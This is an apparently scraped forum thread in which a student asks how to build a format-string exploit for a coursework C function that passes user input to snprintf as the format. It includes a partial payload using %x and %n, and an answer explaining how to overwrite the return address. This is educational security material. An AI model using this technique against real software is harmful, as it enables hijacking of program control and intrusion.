Menu
This is an assignment but I am having problems with the basic understanding.
The vulnerable code:
int choc(char *arg)
{
char buf[400];
snprintf(buf, sizeof buf, arg);
return 0;
}
I understand that arg needs to be a format string which will overwrite the return address with the address of the code I want to execute. But I am having trouble creating the format string.
So, things which the format string needs to have:
In order to get the return address, I just need to look at the address of the 'ret' instruction in gdb right? What exactly is the purpose to the %x? And how do I encode the address of the code I want to execute in the format string?
A test I did: Using gdb I found that the address of my buf is 0xbffffba0. I generated arg to be "\xa0\xfb\xff\xbf_%x.%x.%n"; Shouldn't this write some value to the start of the buff at the address 0xbffffba0? However I get a segfault. What am I doing wrong?
Any help would be appreciated!
724
The "\xa0\xfb\xff\xbf" should not be the address of buf, but rather the location of the return address on the stack (which is the value you wish to overwrite). You'll have to find that value using gdb.
You then need to put enough %x in your format string such that your %n will read that value off the stack and write to the address you specified. You also need to to use the correct field sizes such that %n will actually write the correct value.
69
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
